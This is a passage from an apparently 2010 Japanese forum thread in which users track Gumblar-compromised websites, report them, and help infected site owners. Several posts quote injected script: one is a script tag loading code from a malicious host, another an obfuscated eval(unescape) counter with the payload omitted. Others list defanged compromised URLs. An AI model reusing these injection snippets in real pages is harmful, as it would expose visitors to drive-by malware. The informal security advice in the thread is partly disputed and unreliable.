てめー24しとくわ
せいぜい家でマッポがいつくるかガクブルして待ってろ

553:名無しさん@お腹いっぱい。
10/05/09 02:08:16
>>549
>514です。aguseで昨日の12:00頃調べた時には,>>512が検出されました。
Norton Safe Webで調べてみたところ、以前同サーバの別ページ?で
Bloodhound.Exploit.292の存在が確認されている模様。
パスワードやクレジットカード情報などを盗むウィルスに分類されているようですが
windows7への感染は無いっぽい?よく分からん。

554:名無しさん@お腹いっぱい。
10/05/09 13:22:54
こっそり修正が一番たちが悪い

IPAかJPCERTのGumblarにかかったらどうするかって所に
・公表する
・ホームページの管理者なら、いつからいつまでの間ウィルスが埋め込まれていたのか明らかにする
って内容があった気がする

>>516の上は最低だな

555:名無しさん@お腹いっぱい。
10/05/09 13:48:15
ハニーホエール ってどう?

556:名無しさん@お腹いっぱい。
10/05/09 15:00:07
こりか。
URLリンク(www.lac.co.jp)

557:名無しさん@お腹いっぱい。
10/05/09 15:50:45
>>554
まあそういうことをやるとこはポカするたびにこっそり書き換えとかやって段々信用を無くしてくよ
セキュリティ関係ないけどアクティスの電源とかな

558:コテハン ◆8080adndqg
10/05/09 16:18:44
【陥落サイトのURL悪用厳禁】
slmo●co●jp/
www●hd-cre●com/ ←ここはやられてないけど・・・

www●google●co●jp/search?hl=ja&q=site%3Ahd-cre●com%2F&btnG=%E6%A4%9C%E7%B4%A2&lr=

559:名無しさん@お腹いっぱい。
10/05/09 16:20:32
>>555
こりか。
URLリンク(samspade.org)

560:名無しさん@お腹いっぱい。
10/05/09 16:36:48
>>555
>>556
>>559

これはおそらく自演
迂闊に踏むなよ

561:名無しさん@お腹いっぱい。
10/05/09 16:51:54
このスレに住みついてる奴に知らないアドレスをホイホイと踏む馬鹿は居ないと思うが・・・
まぁ外部から興味本位で来て引っ掛かった奴は「ご愁傷さまだ、さっさとクリーンインストールして来い」で良いと思う

562:名無しさん@お腹いっぱい。
10/05/09 17:08:55
普通のリンクじゃん
馬鹿じゃないの

563:名無しさん@お腹いっぱい。
10/05/09 17:45:35
>>557
段々信用をなくすって言うけど元からないだろう。こういうとこは。

564:名無しさん@お腹いっぱい。
10/05/09 17:51:24
>>561
ご愁傷さま

565:名無しさん@お腹いっぱい。
10/05/09 20:42:15
>>560
アンカーつけると削除依頼が通らなくなるぞ

566:名無しさん@お腹いっぱい。
10/05/09 21:50:14
もみじ 乙!

567:名無しさん@お腹いっぱい。
10/05/09 22:42:05
>>565
アンカーつけるところまで自演じゃないの?

568:名無しさん@お腹いっぱい。
10/05/10 00:32:44
www●historyasia●com/Scripts/AC_RunActiveContent●js
傑作な改竄修正。
管理人は一体何を考えているんだ…

569:名無しさん@お腹いっぱい。
10/05/10 03:25:34
>>568
//12Apr2010 : Malware script

ところどころコメントアウトしてあったり、なかったりw

570:名無しさん@お腹いっぱい。
10/05/10 03:42:17
まだあったのかこのスレ
久しぶりすぎる




571:名無しさん@お腹いっぱい。
10/05/10 05:37:59
>>494
下 >ホームページに関するお詫びとお知らせ

572:名無しさん@お腹いっぱい。
10/05/10 10:41:22
質問があるのですが
ruドメインとcnドメインのサイトは全て危険とみなしてよいのでしょうか?

573:名無しさん@お腹いっぱい。
10/05/10 11:39:45
見なしてもいいけど、それが絶対じゃない

ブラジルとか最近spamの温床になってきてる新興国や発展途上国なんかは要注意だね

574:名無しさん@お腹いっぱい。
10/05/10 12:56:05
.infoとかでも罠サイトがあったって話だし、ドメインだけじゃ判断できなくなってきてる
そのうちcomとかjpもできるんじゃないかね

575:名無しさん@お腹いっぱい。
10/05/10 13:03:32
>>574
comは既にあるらしい

「.ru」ドメイン対策では防げない「Gumblar」攻撃 - マルウェア配布サイトに「.com」などが
URLリンク(www.security-next.com)

576:名無しさん@お腹いっぱい。
10/05/10 13:57:51
新種
stompstamp●com

577:名無しさん@お腹いっぱい。
10/05/10 15:19:55
>>572
全部危険ってわけじゃないだろ。
McAfeeは毎年危ないTLDを発表してるが、2009年は
cm(カメルーン)
com(gTLD)
cn(中国)
ws(サモア)
info(gTLD)
の順だった。
PDF www.mcafee.com/common/media/mcafeeb2b/international/japan/pdf/threatreport/2009_MTMW_Report.pdf
cnは昨年12月14日から、ruは4月1日から登録が面倒になった(書類審査)。
今後は他のが増えてくるんじゃね。

578:名無しさん@お腹いっぱい。
10/05/10 17:15:58
ネット鎖国も防衛手段としては有効だぜ?

579:名無しさん@お腹いっぱい。
10/05/10 17:29:13
URLリンク(www.k)●naka.jp/fs/k●naka/Information.html
ちょっと確認してもらえないか

580:名無しさん@お腹いっぱい。
10/05/10 17:30:33
>>579
ここはそういうスレじゃない

581:名無しさん@お腹いっぱい。
10/05/10 18:01:05
>>579
bloodhound.exploit.292

>>580
死ね

>>553

582:名無しさん@お腹いっぱい。
10/05/10 18:43:41
>>581
>>1も読まないやつに答えるなよ
そういうことするからまた同じバカが出てくるんだろ

583:名無しさん@お腹いっぱい。
10/05/10 19:27:43
>>581
>>581
>>581
>>581
>>581
>>581
>>581
>>581
>>581
>>581
>>581

584:名無しさん@お腹いっぱい。
10/05/10 19:37:25
>>581
GJ!

585:名無しさん@お腹いっぱい。
10/05/10 19:57:32
IDやパスワード抜かれるというけど
ftpだけでなく動画サイトやネット接続のID、パスワードも抜かれるのだろうか


586:名無しさん@お腹いっぱい。
10/05/10 20:33:10
誘導されてきました。お話中おそれいります。
サイト持ちです。

このサイトはコンピュータに損害を与える可能性があります

グーグルでこの表示が出たとの知らせをうけて、該当ページから挿入されたスクリプトを除去し、再アップしました。
しかしながら、今後も同様のケースが考えられるので根底から対処しないといけないということです。

ウイルス除去タイプのプロバイダーを使っていたので、今まで安心していました。

今後サイトに変なスクリプトが挿入されないようにするには、どういった対処がおすすめでしょうか。
皆さんの意見をお願いします。※スレチであれば、誘導もお願いします。


587:名無しさん@お腹いっぱい。
10/05/10 20:38:10
ホームページさっさと閉鎖してアラスカで隠居してください

588:名無しさん@お腹いっぱい。
10/05/10 20:39:12
>>586
URLリンク(www.ipa.go.jp)

589:名無しさん@お腹いっぱい。
10/05/10 20:48:13
>>586
あなたのPCに何か感染していますので
とっととクリーンインストールしてください。

590:名無しさん@お腹いっぱい。
10/05/10 21:05:18
>>585
ネット接続のパス抜かれたら終わりだ・・・
Gumblarで実際にそうなるのかねえ

591:名無しさん@お腹いっぱい。
10/05/10 21:12:27
>>585
通信を監視していますので非セキュアな通信はすべて筒抜けです

592:名無しさん@お腹いっぱい。
10/05/10 21:15:28
>>586
セキュリティ対策ソフト入れないってのはありえないわ
根底から対処っていうのはOS入れなおせっていう意味だよ

593:名無しさん@お腹いっぱい。
10/05/10 21:35:29
>>591
最悪ネット接続すら出来ないのか gkbr

594:名無しさん@お腹いっぱい。
10/05/10 21:36:54
>>592とか何の対策にもなってないんだがw

煽るのもいいけど、FTPのパスワードは最低変えておけぐらい言えばいいのに

595:名無しさん@お腹いっぱい。
10/05/10 21:43:00
>>591
よく分からんなFWは無力なのか?

596:名無しさん@お腹いっぱい。
10/05/10 21:49:40
こっちも。
URLリンク(www.ipa.go.jp)
(3)ウェブサイト改ざんの被害発生時の対処
特に利用者の告知は必須。

ウイルスのチェック方法等をあわせて告知しないと、被害が拡大する↓
URLリンク(detail.chiebukuro.yahoo.co.jp)


597:名無しさん@お腹いっぱい。
10/05/10 21:51:25
>>594
感染PCから変えても無駄だろ

598:名無しさん@お腹いっぱい。
10/05/10 21:55:13
586です
対処します。ありがとうございました。

599:名無しさん@お腹いっぱい。
10/05/10 21:58:08
>>593
ISPからの個人あてメールも削除おすすめ・・・かも

600:名無しさん@お腹いっぱい。
10/05/10 22:08:59
>>588>>596を確認せずにホイホイ踏むようなら、救いようがないな

601:名無しさん@お腹いっぱい。
10/05/10 22:33:18
gnome「夕張メロン熊かわいいよ夕張メロン熊」

602:名無しさん@お腹いっぱい。
10/05/10 22:36:25
Adobe Reader以外のPDFソフトでJavaScript関連の他に気をつける事はあるの?

603:名無しさん@お腹いっぱい。
10/05/10 23:06:12
PDF X-Change ViewerにだってJavaScriptはあるぞとだけ


604:名無しさん@お腹いっぱい。
10/05/10 23:29:19
Office97や2000で散々マクロウィルス叩かれたけど、
だからといって、一太郎や花子に脆弱性が無いという保障にはならない

605:名無しさん@お腹いっぱい。
10/05/10 23:31:59
一太郎とか最近狙われたばっかじゃん

606:名無しさん@お腹いっぱい。
10/05/10 23:44:53
ここ2~3年くらいで急に狙われ出したな>一太郎
あとATOKも

607:名無しさん@お腹いっぱい。
10/05/10 23:58:33
【陥落サイトのURL悪用厳禁】
sound●jp/kimitoiumizunonakade/
fourlcp●com

>>576
色々やってみた

上:
URLリンク(www.virustotal.com)
下(全部):
URLリンク(www.virustotal.com)
下(<script></script>のみ):
URLリンク(www.virustotal.com)
swfobject.js:
URLリンク(www.virustotal.com)


「「Gumblar」関連のウイルスがランキング上位に - 「一太郎」狙いのゼロデイ攻撃も」
URLリンク(www.security-next.com)

608:名無しさん@お腹いっぱい。
10/05/11 00:03:47
>>607
MSE使えねー

609:名無しさん@お腹いっぱい。
10/05/11 00:17:32
ところでこのサイトの主にウイルスを駆除させる妙案はないものでしょうか
myako●net

昨日だけで9000人以上が閲覧
早急にどうにかしないとまずいのに何度メール送ってもスルーされる…

610:名無しさん@お腹いっぱい。
10/05/11 00:25:15
>>609
確認できないんだが

611:名無しさん@お腹いっぱい。
10/05/11 00:39:59
>>609
こちらの環境でも現在は修正及びサブドメインは403にされている模様です。

612:名無しさん@お腹いっぱい。
10/05/11 00:43:59
>>611撤回
残ってた>>445 Last-Modified: Sun, 11 Apr 2010 21:36:14 GMT
alienear●ru

613:名無しさん@お腹いっぱい。
10/05/11 00:54:14
>>610
aguseじゃでなかったけどgredだとでたぞ

614:名無しさん@お腹いっぱい。
10/05/11 01:18:41
>>613
ここの
myako.net/download/down2.cgi
これがやられてるね。
myako.net/download/kensakumdl.js



615:名無しさん@お腹いっぱい。
10/05/11 01:23:15
myako.net/java2/amophoto/zidouslide.html
myako.net/juke.html
myako.net/java2/amophoto/photo.html

この辺も


616:名無しさん@お腹いっぱい。
10/05/11 01:28:26
myako.net/download/

ここ全部やられてる



617:名無しさん@お腹いっぱい。
10/05/11 01:33:17
8080系のサイト改竄って管理人には解んないのかな?
結構出入りの多そうなサイトだし…HP作成のjs配布サイトってw

618:名無しさん@お腹いっぱい。
10/05/11 01:35:40
>>614-616
>>1
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***

>>609
myako●net [219●94●128●187] www947●sakura●ne●jp
>>7のさくらにつーほーすますた。

619:名無しさん@お腹いっぱい。
10/05/11 01:36:47
>>618
乙です

620:名無しさん@お腹いっぱい。
10/05/11 01:38:49
gredはスルーしすぎ

621:613
10/05/11 01:52:32
>gredはスルーしすぎ

俺もAVは入れて無いんだけどね


622:名無しさん@お腹いっぱい。
10/05/11 01:56:38
朝までに緑になってますように (-人-)
URLリンク(www.google.com)

623:この'誰の' ◆yUyb3Tqn92
10/05/11 04:45:26
(*'д'*)v

477 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:33:22 ID:38FsBWE+0
>>476
法則にそってレアアイテム手に入れる方法あるぞ
URLリンク(myako.net)

チート嫌いなら別だがね

478 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:34:48 ID:Zp72kWEj0
>>477
裏技でプレイするのは最後の手段だろ

479 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:36:01 ID:ZTLYXdOv0
>>477
そんな法則あったんだな、今2匹目で普通に出ちゃったから別ので詰まったら試してみよう

480 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:37:56 ID:YMFIRoo+0
しっぷう、しっぷう、ラウンドゼロ

これマジでどうすりゃいいの?
たまに当たっても何もできないまま負けるんだけど…

481 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:38:05 ID:Zp72kWEj0
>>479
握手しよう

482 :('д') ◆yUyb3Tqn92 :2010/05/11(火) 04:40:33 ID:Zp72kWEj0
Д< クククク、引っかかったな愚かな勇者ども

624:この'誰の' ◆yUyb3Tqn92
10/05/11 04:48:55
('`д´')エッヘン

620 :名無しさん@お腹いっぱい。:2010/05/11(火) 03:27:31 ID:HJ28nnYh
>>618
ぱくり乙
URLリンク(sound.jp)

自分の意見みたいに言うなよks

621 :名無しさん@お腹いっぱい。:2010/05/11(火) 03:27:47 ID:qRZV9Fiz
>>615
そこ、本当にお前の村かよw
「HOME」付きのSSを晒せよw

622 :名無しさん@お腹いっぱい。:2010/05/11(火) 03:28:48 ID:JReWC+AX
>>620
スペック晒してるから
いつ攻められてもおかしくないだろこれ


625:名無しさん@お腹いっぱい。
10/05/11 04:51:18
なんだこの馬鹿は

626:八頭 ◆YAGApwSaEw
10/05/11 06:32:48
Google危険警告ページ
hatoyamakoji●com

627:名無しさん@お腹いっぱい。
10/05/11 07:53:56
>>626
hatoyamakoji●com [59●106●13●145] www495●sakura●ne●jp
>>7のさくらにつーほーすたー。

628:名無しさん@お腹いっぱい。
10/05/11 14:30:34
>>624
これ踏んでしまった。
何かマズいものあります?

629:名無しさん@お腹いっぱい。
10/05/11 16:20:15
お前の頭かな

630:名無しさん@お腹いっぱい。
10/05/11 16:33:14
>>628
あーあ、やっちゃったね
ご愁傷様

631:名無しさん@お腹いっぱい。
10/05/11 16:58:06
もうこれだけ蔓延してると、踏まないなんて無理だな

632:名無しさん@お腹いっぱい。
10/05/11 17:02:54
>>630
ガンブラーだったんですか?
OSクリーンインストールしないとマズイんでしょうか?

633:名無しさん@お腹いっぱい。
10/05/11 17:16:30
さっさとしろよボケ

634:名無しさん@お腹いっぱい。
10/05/11 17:18:45
>>632
>>633さんもこんなに怒ってるんだぞ

635:名無しさん@お腹いっぱい。
10/05/11 17:21:29
がんぶらぁって感染したら何するの?
ゴチャゴチャ書いてるの読むのメンドいから説明してよ
>>2とか意味わかんないし既存のセキュリティソフトでは何の意味も無いってこと?

636:名無しさん@お腹いっぱい。
10/05/11 17:32:02
感染したら周りに迷惑だから
PCごと捨てちゃえばメンドくなくて簡単だよ!

637:名無しさん@お腹いっぱい。
10/05/11 17:32:28
説明を求めてるのにその回答は無いわー
お前アタマ悪いだろ?

638:名無しさん@お腹いっぱい。
10/05/11 17:35:29
OSクリーンインストールしたくないです(´;ω;`)
本当に感染してしまったんでしょうか

639:名無しさん@お腹いっぱい。
10/05/11 17:35:53
>>637
>>2読んでも理解できなければPC捨てた方がいいじゃない?^^

640:名無しさん@お腹いっぱい。
10/05/11 17:38:32
結局説明出来ないのかよw
テンプレ任せでよく分かってない奴が居着いて煽ってるんじゃ話にならんな

641:名無しさん@お腹いっぱい。
10/05/11 17:43:53
>>572 >>577を見て思ったのですが
ruドメインとcnドメインのアドレスのサイトが危険な傾向にあるというだけで
そのドメインがアドレスに無いロシアのサイトや中国のサイトが危険というわけではないのですね

642:名無しさん@お腹いっぱい。
10/05/11 17:46:11
>>641
日本語で

643:名無しさん@お腹いっぱい。
10/05/11 17:53:44
>>642
ロシアのサイトでもruドメインではないサイトがあるけど
そういう場合は危険なのかという話

644:名無しさん@お腹いっぱい。
10/05/11 17:55:52
>>643
元のドメインがどこかは関係ない

645:名無しさん@お腹いっぱい。
10/05/11 18:07:46
>>638
したくないとかそういう意思の問題じゃないです
とりあえずスキャンしてみればいいじゃない

646:名無しさん@お腹いっぱい。
10/05/11 18:27:00
最近思うんだけど
gumblerに感染してしまった場合
感染の確認方法はあるのでしょうか
また最近のgumblerに感染するとどんな症状が出たりするのでしょうか?
もちろん>>2は怠っていません


647:名無しさん@お腹いっぱい。
10/05/11 18:28:45
もう無理だって踏まないとかは、
だからテンプレにあることしとけばいい
ゼロデイなんて言っても、実際になにか起こる前にはここが狙われそうだから気をつけようとか前段階で話がされるもんだし、その情報に気を配って設定してればおk

648:名無しさん@お腹いっぱい。
10/05/11 18:45:21
マジで返答の半分以上が「PC捨てれば^^」とか「捨てPCで感染すれば分かるんじゃない^^」とか「怖いならクリーンインスコおkおk^^」とかはぐらかしてばかりの奴ばっかりだな……
まぁID出ない上gumblerを自演で意図的にばら撒いてるヘンなのまでいるんだからそういう粘着の類が居てもおかしくは無いのか


649:名無しさん@お腹いっぱい。
10/05/11 18:49:11
>>647
マジで昨日まで大丈夫だったサイトが今日見たらGumbler移ってました、ってのが
ありえるからな……
危機管理の無い「自分だけは大丈夫」って思ってるサイト持ちの奴がどんどん広めてて、
ネットサーフィンする以上避けようがない
もうビクビクするならネット見るな、のレベル

650:名無しさん@お腹いっぱい。
10/05/11 18:49:39
>>647
>>646はそのPCが感染してるかどうかの確認方法を聞きたいんじゃないか?

651:名無しさん@お腹いっぱい。
10/05/11 18:56:02
>>648
信頼できる情報は専門家から金を出して買え

652:名無しさん@お腹いっぱい。
10/05/11 19:01:25
仮想デスクトップで最近のGumblar踏んでくれる人柱はいないのか

653:名無しさん@お腹いっぱい。
10/05/11 19:02:59
>>650
あ、いや別に>>646にレスしたわけじゃない
しかも>>647はほとんど願望、素人のこうであってくれと言う嘆きでしかない

654:名無しさん@お腹いっぱい。
10/05/11 19:09:29
>>652
言い出しっぺの法則

655:名無しさん@お腹いっぱい。
10/05/11 19:46:43
>>646
確認方法はスキャンしてみるって程度
様々なマルウェアをDLするのでそのどれかがスキャンにひっかかるはずという理由

FTP設定ファイルの検索、通信の盗聴、一時期は特定サイトへの攻撃などあったけど
目に見えてわかりやすい症状がでるかというとたぶんない
偽セキュリティソフトのインストールも確実にされるかはわからんしなあ

656:名無しさん@お腹いっぱい。
10/05/11 19:48:26
>>648
何がわからないのかいってくれないと回答しようがないじゃない
質問の大半が「感染したのでしょうか?」なんだから
心配ならOS入れなおせとしか言えないよ

657:名無しさん@お腹いっぱい。
10/05/11 19:51:23
>>655
以前はPC動作が重い、chmファイル改ざんと分かりやすかったのになあ

658:名無しさん@お腹いっぱい。
10/05/11 19:57:05
【感染確認方法】
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)

削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索

C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除


この確認方法も今は通用しないのか

659:名無しさん@お腹いっぱい。
10/05/11 20:04:01
常識的に考えると
HKLMとHKCUの\SOFTWARE\Microsoft\Windows\CurrentVersion\Run辺りで
常駐させてると思うからそこになければ平気な気がするけど
無ければ絶対問題無いといい切れないのが、進化し続けるウィルス

660:名無しさん@お腹いっぱい。
10/05/11 20:19:26
>>646
gumblerに感染したかの確認って言ってるけどgumblerで入ってくるマルウェアは一種類じゃないし
改竄されたサイトに>>2を怠って接続したりしたら勝手にマルウェアをダウンロードされてインストール
されるってこと
入ってくるマルウェアがダウンローダー系だったら色んなワームやら偽セキュリティーソフトがダウンロードされるわけだし
ウイルス対策ソフト入れてたって検出されないやつだったらそのまま入ってきてインストールされるしね
確認方法なんて走ってる怪しいProcessの確認とか、レジストリーのrunキーの確認とか今までの既存のウイルスの感染確認しかない
アンチウイルスソフト最新にして>>2をやる以外に対策はない
ネット使ってて絶対に感染しない対策なんてそもそもないし
それでも不安ならRITURNILでも使ってサイト閲覧は全部仮想化してやるとか
ユーザーの了解なく勝手にダウンロードされてインストールされるのがgumblerの怖いところだよねぇ




661:名無しさん@お腹いっぱい。
10/05/11 20:20:59
>>657
重くなるのはスペック次第じゃないかな
今も低スペックなら重くなるかもしれない

>>658
ファイル名なんてすぐ変更できるから意味がないよね

>>659
初期Gumblarはドライバ部分じゃなかったっけ?

662:名無しさん@お腹いっぱい。
10/05/11 20:24:10
UACとか保護モードも通じない?からなあ
QuickTime無しでmp4やmov形式見られる他のプレイヤーもほとんど無いし

663:名無しさん@お腹いっぱい。
10/05/11 20:44:51
QuickTimeプレイヤーなんか使ってる奴いるのか?
alternativeでコーデックだけインストールしてブラウザのプラグインはインストールしないというやり方のほうが
いいと思うのだが

664:名無しさん@お腹いっぱい。
10/05/11 20:57:56
だいたいQuickTimeは攻撃に使われてないだろ

665:名無しさん@お腹いっぱい。
10/05/11 21:00:11
>>663
つかってなくてもアップルさんが入れろっていうから…

666:名無しさん@お腹いっぱい。
10/05/11 21:04:46
>>663
Alternativeのコーデックは他の一部プレイヤーで不都合ありだからなあ

URLリンク(www.katch.ne.jp)

667:名無しさん@お腹いっぱい。
10/05/11 21:20:36
ブラウザにプラグイン的に拡張されるのは全部脆弱性あるとまずいね
Quicktimeは現時点で攻撃目標にされてないだけで、
今後何があるかわからん

668:名無しさん@お腹いっぱい。
10/05/11 21:23:13
そんなおびえる必要なんてねえだろ
病気かよ

669:名無しさん@お腹いっぱい。
10/05/11 22:24:26
Quicktimeは色々行儀悪いから入れないのが普通
movファイルとかまず使わんしmp4はffdshowでも入れておけばいいし

670:名無しさん@お腹いっぱい。
10/05/11 22:27:25
普通とか何様だよ
必要な人もいるんだろ

671:名無しさん@お腹いっぱい。
10/05/11 22:29:52
ガンブラーについてもよく分かってないくせに
偉そうに語るやつが多いな

672:名無しさん@お腹いっぱい。
10/05/11 22:34:24
>>668
>>670
>>671

673:名無しさん@お腹いっぱい。
10/05/11 22:41:03
ちなみにお前のことな

674:名無しさん@お腹いっぱい。
10/05/11 22:44:16
ちなみにお前のことな

675:名無しさん@お腹いっぱい。
10/05/11 22:44:48
でた
馬鹿得意のコピペ

676:名無しさん@お腹いっぱい。
10/05/11 22:48:27
低脳は自分の馬鹿はわからないのかorz

677:名無しさん@お腹いっぱい。
10/05/11 22:57:41
くだらね

678:名無しさん@お腹いっぱい。
10/05/11 22:59:40
必要なら使えばいいだろってことだろ
攻撃にも使われてないのに使うななんていうのはありえねえ
そんこと言ったら何も使えん

679:名無しさん@お腹いっぱい。
10/05/11 23:03:23
>>678
いちゃもんつけて
スレの流れ切ってんのはお前だろすっこんでろw

680:名無しさん@お腹いっぱい。
10/05/11 23:46:35
俺には何人で会話してるのかさえ分からん……
無知でサーセン

681:コテハン ◆8080adndqg
10/05/12 01:15:42
>>662-669
VLC Media Playerはどないだ?
再生可能なやつ↓
MPEG、AVI、ASF、WMV、WMA、MP4、MOV、3GP、OGG、OGM、Annodex、MKV
WAV、DTS、AAC(m4a)、AC3、A52、Raw DV、FLAC、FLV、MIDI、SMF、MXF・・・

682:名無しさん@お腹いっぱい。
10/05/12 01:33:41
>>682
MediaPrayerClassicも仲間に入れてあげてください

683:名無しさん@お腹いっぱい。
10/05/12 01:41:49
また間違えたorz

684:名無しさん@お腹いっぱい。
10/05/12 02:06:12
>>681
> VLC Media Playerはどないだ?

VLCの現行配布バイナリは 0-day 持ち。
Fix済みソースはリリースされてんのに、
なかなかバイナリがでない。

685:名無しさん@お腹いっぱい。
10/05/12 02:12:06
>>684
現行バイナリは1.0.5。fix済みは1.0.6


686:名無しさん@お腹いっぱい。
10/05/12 02:12:48
VLC.は1.0.6待ち

687:名無しさん@お腹いっぱい。
10/05/12 04:46:29
myako●net
>サーバのファイルにスパイウェアを仕掛けられたため

えぇー

688:名無しさん@お腹いっぱい。
10/05/12 05:30:09
メルに>>8送ったんですけどねぇ。。。

689:名無しさん@お腹いっぱい。
10/05/12 10:30:48
VLCがゼロデイ持ちって言ったって、ちょっと検索したけどいつも見てるホームページが改竄されるGumblerほどの脅威は無いんじゃないの?
自分でダウンロードした覚えのないモノ迂闊に開かない限り問題無いと思うんだけどねぇ
そんなホイホイ不審なファイル開くのって山田オルタナにも感染しそうだ

690:名無しさん@お腹いっぱい。
10/05/12 12:21:33
VLCのフォントってどうやれば変えられるんだ?

691:名無しさん@お腹いっぱい。
10/05/12 12:28:32
VLCは何度設定変更しても元に戻るからもう諦めてデフォで使ってる

692:名無しさん@お腹いっぱい。
10/05/12 13:16:18
>>681
俺はSM PLAYERも仲間に入れてね


693:名無しさん@お腹いっぱい。
10/05/12 13:53:28
僕がつこうてる動画プレーヤーの話は余所でやれ

694:名無しさん@お腹いっぱい。
10/05/12 17:02:33
>>687
これひどいな
サイト主のやる気とか関係なく、後始末ぐらいはちゃんとしろよ
>>607の一番上も403にしただけだし、、、
まあこの後ちゃんと対策含めた告知出すのかもしれんが

695:名無しさん@お腹いっぱい。
10/05/12 18:55:06
むしろちゃんと利用者に対して説明したサイトってなくね
JRとか競馬場のとこですら「てめーらで勝手にウィルススキャンして対処して下さいね」としか言ってないし

696:コテハン ◆8080adndqg
10/05/12 19:59:24
【陥落サイトのURL悪用厳禁】
www●fukuyama-flowerlc●com/
pinkhost●web●fc2●com/i/more06/

ところで、myako●netは再開するつもりなのかにゃ?

697:名無しさん@お腹いっぱい。
10/05/12 20:21:26
Shockwave Playerも危険性あり?

698:名無しさん@お腹いっぱい。
10/05/12 21:00:44
myako●net
再開してるね。

>スパイウェアで攻撃されたため全削除しました(><)
>初心者に優しいスクリプトを再度どのくらいまでできるかわかりませんが配布します
>順次再構築していきますので時々覗いてみて下さい

またやられそう

699:名無しさん@お腹いっぱい。
10/05/12 21:39:47
>>697
現時点でGumblarで利用されていないが
今日重大な脆弱性の修正バージョンがリリースされているので
入れてるなら更新した方がいいし、入れてるだけで使ってないなら削除した方がいい

700:名無しさん@お腹いっぱい。
10/05/12 21:54:37
www●kaizenya●net/newevent ←2月から感染したまま
infom●biz/secretdiet

701:名無しさん@お腹いっぱい。
10/05/12 22:20:27
とあるウェブサイトより

<script language=javascript><!-- Yahoo! Counter starts here-->if(typeof(yahoo_counter)!=typeof(1))eval(unescape(' <--省略--> );var yahoo_counter=1;<!-- counter end --></script><!-- counter end--></script>

上記部分だけ抜き出して投げてみた
URLリンク(www.virustotal.com)

702:名無しさん@お腹いっぱい。
10/05/13 02:44:34
>>586です。
あれからウイルス駆除ソフトでチェックをして、見つかったものを削除。

あわせて、>>658をみて、siszyd32.exeとTMD.tmpがないことを確かめました。

FTPはレンタルサーバーのものを使っているのでパスはありません。

一応これで安心でしょうか? >>2も対処しました。ご教授お願いします。

703:名無しさん@お腹いっぱい。
10/05/13 03:10:45
www.hipparidako.net/index.html


704:名無しさん@お腹いっぱい。
10/05/13 03:20:47
>>702
スキャンはあくまで目安であり完全に除去できるものではありません
OSの入れなおしをしてください
また同一ネットワーク上にPCがあるならそちらもスキャンしてください

レンタルサーバでもFTPならパスがあるはずだけどそのへんはわかりません

ちなみに以下は意味がないです
> あわせて、>>658をみて、siszyd32.exeとTMD.tmpがないことを確かめました。

705:名無しさん@お腹いっぱい。
10/05/13 07:22:15
>>703
rollover.jsにスクリプトを確認
欠けているのでおそらく不発ですが、放置するのもまずいですね…

706:名無しさん@お腹いっぱい。
10/05/13 08:33:19
>>702
パスがないって…anonymousなの?

707:名無しさん@お腹いっぱい。
10/05/13 08:52:38
コンパネ使ってるとかなんじゃないの

708:名無しさん@お腹いっぱい。
10/05/13 09:03:39
>>702
マルウェア専用のダウンローダーが入ってればそんな事しても意味無い

>FTPはレンタルサーバーのものを使っているのでパスはありません。
意味がわかりません

709:コテハン ◆8080adndqg
10/05/13 10:58:53
>>702
■感染パソコンの修復は「OSの再インストール」が近道
URLリンク(www.so-net.ne.jp)

スキャナー走らせまくって「不確実な駆除作業」に時間をかけるより
クリーンインストールのほうが早くて確実なのです。


710:名無しさん@お腹いっぱい。
10/05/13 12:00:37
>>702
>>2は感染する前にやらないと無意味

711:名無しさん@お腹いっぱい。
10/05/13 12:12:07
>>702です
みなさん、ありがとうございます。
ウイルス駆除ソフトで、検知されなかったのでもう大丈夫だと思っていました。

OSの再インストールというのをやったことがないので不安ですが、リカバリディスクは
PCを購入した時に
解説書にあるとおりに「工場出荷時のイメージ」として作ったCDのことだと思いますので、
それで復元できると思います。
やってみます。

712:名無しさん@お腹いっぱい。
10/05/13 12:50:07
リカバリディスクで復元出来ない物は無いだろ
出来ないとしたらPCが物理的に壊れてる

713:名無しさん@お腹いっぱい。
10/05/13 13:02:10
>>711
以下の鶴で検査して異常がなければ無問題だよ。
リカバリする前に試してみ。

オンラインウイルススキャン
URLリンク(www.kaspersky.co.jp)
ウイルス駆除ツール
URLリンク(support.kaspersky.co.jp)
KatesKiller
URLリンク(support.kaspersky.co.jp)

714:コテハン ◆8080adndqg
10/05/13 13:28:52
>>702
サイトに突っ込まれたのはどのタイプかにゃ?
1:<script src=http://~中略~.php ></script>
2:<script>~難読化されたコード~</script><!--英数字の羅列(32文字)-->
3:1・2以外のコード
4:よくわかんない


715:名無しさん@お腹いっぱい
10/05/13 13:42:44
>713
ありがとうございます。やってみます。

>714
1だと思います。
短めのもので、一ページに一行だけ挿入されていました。
ページの削除→再アップロードで消えました。

716:名無しさん@お腹いっぱい。
10/05/13 13:46:09
URLリンク(www.st.ryukoku.ac.jp)
Shockwaveなんて今時使わないだろ
やっぱり要らないプラグイン入ってる奴はアンインストールしとけ

717:名無しさん@お腹いっぱい
10/05/13 13:57:09
>>702
>>714
頻出してすいません。さがしてきました。これです。
<script src=URLリンク(science.webphoto.ir)
></script>

718:名無しさん@お腹いっぱい。
10/05/13 14:07:08
>>717
>>1
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***

URLリンク(www.google.com)
URLリンク(safeweb.norton.com)
URLリンク(www.siteadvisor.com)

719:名無しさん@お腹いっぱい。
10/05/13 14:25:29
aguseで調べると「同一サーバ上の他のウェブサイト」という項目があるけど
その調べたサイトが安全でも「同一サーバ上の他のウェブサイト」がひとつでも感染してると
調べたサイトも危険ということになるのか?

720:コテハン ◆8080adndqg
10/05/13 14:40:16
>>717
そりはGumblar(Gumblar.x)だぬ。
>>713でもおkだけど、他の物も入り込んでる可能性が高いから、
リカバリ後に>>2を実行を推奨するのです。


721:名無しさん@お腹いっぱい。
